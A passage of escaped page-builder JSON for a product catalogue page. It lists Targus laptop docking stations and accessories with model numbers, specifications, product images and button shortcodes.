id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a345f9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b55e07f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"112d0b9\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1491c5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c1325c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0c537db\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK171)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a45b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"80b3cd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK177)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da54caa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"05b138b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV4K Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK160AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e1c8e0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"1aa8cc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec212c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACP71USZ_grande.png?v=1551118350\\\" alt=\\\"Universal USB 3.0 DV Docking Station with Power\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a2463c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2bb069e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0027659_universal-usb-30-dv4k-docking-station-with-power_grande.jpg?v=1543990156\\\" alt=\\\"Universal USB 3.0 DV4K Docking Station with Power\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d8676ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b6b9ca8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/dock160usz_grande.png?v=1554473002\\\" alt=\\\"Universal USB 3.0 DV4K Docking Station\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5008081\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c1814d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d78e228\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual 2048 x 1152 at 60Hz 24 bpp color video (single 2K 2560 x 1440 at 50Hz HDMI) leveraging the DisplayLink DL-3900 technology<\\/li><li>19VDC PC laptop power and charging up to 90W<\\/li><li>Removable standalone power and charging tip compartment<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><li>Wedge design for laptop mounting<\\/li><li>Includes detachable 1-meter USB \\u00b5B to A host cable<\\/li><li>Includes 120W AC adapter and power connected purple LED light<\\/li><li>Includes detachable 1-meter DC host power and charging cable<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d409cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"362fae6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual DisplayPort 1.2++ (with MST), dual HDMI 2.0, or one of each external monitor port<\\/li><li>19VDC PC laptop power and charging up to 90W<\\/li><li>Removable standalone tip compartment<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><li>Wedge design for laptop mounting<\\/li><li>Includes detachable 1-meter USB 3.0 uB to A host cable<\\/li><li>Includes 120W AC adapter and power connected purple LED light<\\/li><li>Includes detachable 1-meter DC host power and charging cable<\\/li><li>Dual 4K2K up to 4096x2160 60Hz (p60) 24 bpp color video monitor support leveraging the DisplayLink DL-6950 chipset<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d550746\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"80f7e0c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual DisplayPort (DP 1.2a) or Dual HDMI (HDMI 2.0) video or one of each<\\/li><li>Dual 4K Ultra HD video 4096x2160 60Hz (p60) 24 bpp with 6-Channel (5.1) Audio<\\/li><li>1 USB-C device port (USB 3.0 5Gbps data only)<\\/li><li>1 Gigabit Ethernet port for wired connectivity<\\/li><li>4 USB 3.0 ports for the latest peripherals (1 BC1.2 fast device-charging port)<\\/li><li>1 3.5mm combo Audio In\\/Out port for mics, speakers, and earphones<\\/li><li>Includes 1-meter USB-\\u00b5B\\/M to A\\/M cable (detachable)<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates standard industry-security locks to safeguard equipment<\\/li><li>Universal compatibility with the majority of laptop and PC tablet brands and platforms<\\/li><li>Includes 45W AC adapter<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"057d62b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"cb49182\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6f3b6b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c43a02c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4105e5d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"45a2c58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"509b46a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5955103\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"52af851\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1e9b1c2\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5df361e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"5b30a76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6341b4c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C Universal DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK180AP)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3ccec06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"133d383\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Universal Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK410AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17782db\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ba6eb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>2K Universal Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK120AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2528fe1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c82277a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7648653\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0030076_usb-c-universal-dv4k-docking-station-with-power_grande.jpg?v=1544442889\\\" alt=\\\"USB-C Universal DV4K Docking Station with Power\\\" width=\\\"234\\\" height=\\\"234\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e22637e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"142bf79\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0041279_usb-c-universal-docking-station-black.jpeg\\\" width=\\\"236\\\" height=\\\"236\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3eac094\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8261346\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/DOCK120USZ_ACP120US_50_MAIN-ALT2_grande.png?v=1549657702\\\" alt=\\\"2K Universal Docking Station\\\" width=\\\"238\\\" height=\\\"238\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58c2b8c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b8fee76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97b7a35\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) port support dual 4k Ultra HD monitors<\\/li><li>Power Delivery 2.0 provides up to 60W charging<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C device port (USB 3.0 data only)<\\/li><li>1 Gigabit Ethernet port for secure, wire speed Ethernet access<\\/li><li>4 USB 3.0 ports for the latest peripherals (1 fast device-charging port)<\\/li><li>Includes 1-meter USB-C to C host cable (detachable)<\\/li><li>1 3.5mm combo Audio In\\/Out for mics, speakers, and earphones<\\/li><li>2 DisplayPort (DP 1.2a) and 2 HDMI (HDMI 2.0) ports support dual 4K Ultra HD monitors<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5e0b083\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"079e079\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 Gigabit Ethernet Port for wired access at ultra-fast speeds<\\/li><li>Ergonomic wedge design for comfortable typing<\\/li><li>Integrated lock slot accommodates standard security locks to safeguard equipment<\\/li><li>Universal compatibility with popular laptop and PC tablet brands and operating systems<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e5dec57\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7263a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 Audio In\\/Out port for mics, speakers and earphones<\\/li><li>1 DVI-I and 1 HDMI port supports dual monitors (up to 2048 x 1152 x 60 fps)<\\/li><li>1 Gigabit Ethernet port for wired access at ultra-fast speeds<\\/li><li>3 USB 3.0 SuperSpeed ports for the latest peripherals<\\/li><li>1 USB 3.0 powered port for fast device charging<\\/li><li>Integrated Lock Slot accommodates security locks to safeguard equipment<\\/li><li>Universal compatibility with popular brands and operating systems<\\/li><li>1 DisplayPort port supports a single 2K monitor (up to 2560 x 1600 x 30 fps)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9047438\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9064b56\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3a7aa27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bf24fa2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c4ea1e8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f009791\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"789ec09\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da4ffea\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"280bef3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c1f4b06\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"14ef8dc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"60548a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b553fd8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>VersaLink Universal Dual Video Travel Dock<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK110AP)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"531cd10\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a984a69\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C DisplayPort\\u2122 Alt-Mode Travel Dock<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK411)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"929416d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4b4a72e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Alt-Mode Travel Dock w\\/ PD<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK412AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad7e09\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e8e16dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"933977a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/dock110usz_grande.jpg?v=1553684661\\\" alt=\\\"VersaLink Universal Dual Video Travel Dock\\\" width=\\\"259\\\" height=\\\"180\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9b8f07c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4e11288\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0027522_usb-c-displayport-alt-mode-travel-dock_1024x1024.png?v=1546599971\\\" width=\\\"181\\\" height=\\\"181\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ce38b83\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b5d41f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0050999_usb-c-alt-mode-travel-dock-w-pd-black_150.png\\\" alt=\\\"Picture of USB-C Alt-Mode Travel Dock w\\/ PD (Black)\\\" width=\\\"187\\\" height=\\\"187\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e209b35\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c7ea6f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b59de72\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>VGA video port with 2048 x 1152 at 60 FPS resolution. HDMI video port with 2560 x 1440 at 50 FPS resolution. Gigabit Ethernet port for secure, wire speed Ethernet access. 2 USB SuperSpeed 3.0 ports for mice, flash drives, external hard drives and card readers.<\\/li><li>Integrated USB power cable connects to laptops, 2-in-1s and Microsoft Surface.<\\/li><li>Compact, smartphone-size dock weighs less than 5.5 ounces for easy portability<\\/li><li>Mac or PC compatible<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cf4acb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed7cdb2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Host-powered 90 mm tethered USB Type-C DisplayPort\\u2122 Alt-Mode (compatible with Thunderbolt\\u2122 3) host connection<\\/li><li>VGA up to 2048 x 1152 60Hz or HDMI2.0 up to 4096 x 2160 30Hz 24 bpp monitor connection<\\/li><li>1 USB 3.1 Gen 1 5Gbps (USB 3.0) Type-A port<\\/li><li>1 Gigabit Ethernet port<\\/li><li>HDMI includes 6 (5.1) channel audio<\\/li><li>Universal compatibility with popular Windows\\u00ae and macOS\\u2122 platforms<\\/li><li>Compact size that\\u2019s ideal for travel<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af63771\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a6089bc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>mDP (4096 x 2160 p30 max)<\\/li><li>HDMI (4096 x 2160 p30 max)<\\/li><li>VGA (1920 x 1200)<\\/li><li>USB-C upstream cable (Laptop charging capable by PD pass through)<\\/li><li>2 x USB 3.1 Gen 1 type A downstream port<\\/li><li>1 x USB-C PD pass through (up to 60W) port with USB 3.1 Gen 1 downstream data support<\\/li><li>Gigabit Ethernet; Lock Slot<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6bd3110\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e6c4a3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1f4a7f2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"edce3a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6c36b73\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f56d76e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e61842f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"99db6fd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"aa18c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"adb6db3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"490dda7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1b4a251\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"173a4c8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Dock Accessories\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17016d0\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9c15a98\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4ed087c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C to USB-A Cable<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACC1104GLX)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0932912\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8825bbc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>3-Pin 3-Way Hydra DC Power Cable<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACC1009USX)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ce75109\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5870ac3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Multiplexer Adapter<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACA46USZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4969a2c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b576756\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Alt-Mode Travel Dock w\\/ PD<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACA42USZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"19c81a5\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"ccebe66\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b656cbc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0053546_usb-cf-to-usb-30-am-cable.jpeg\\\" width=\\\"188\\\" height=\\\"188\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1efc850\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f549af5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0030033_3-pin-3-way-hydra-dc-power-cable.png\\\" width=\\\"187\\\" height=\\\"187\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c69d965\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"42471ae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACA47GLZ_MAIN1_grande.png?v=1564601685\\\" alt=\\\"USB-C Multiplexer Adapter\\\" width=\\\"189\\\" height=\\\"189\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"aa37978\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"15b0138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACA42USZ_grande.jpg?v=1553683594\\\" alt=\\\"USB-C\\u2122 Demultiplexer\\\" width=\\\"194\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5635ad5\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"bac619d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1f7ee4f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>USB Type-C female to USB 3.0 Type-A cable<\\/li><li>10cm long with tether<\\/li><li>Transfers data at rates up to 5 Gbps<\\/li><li>Compatible with Targus 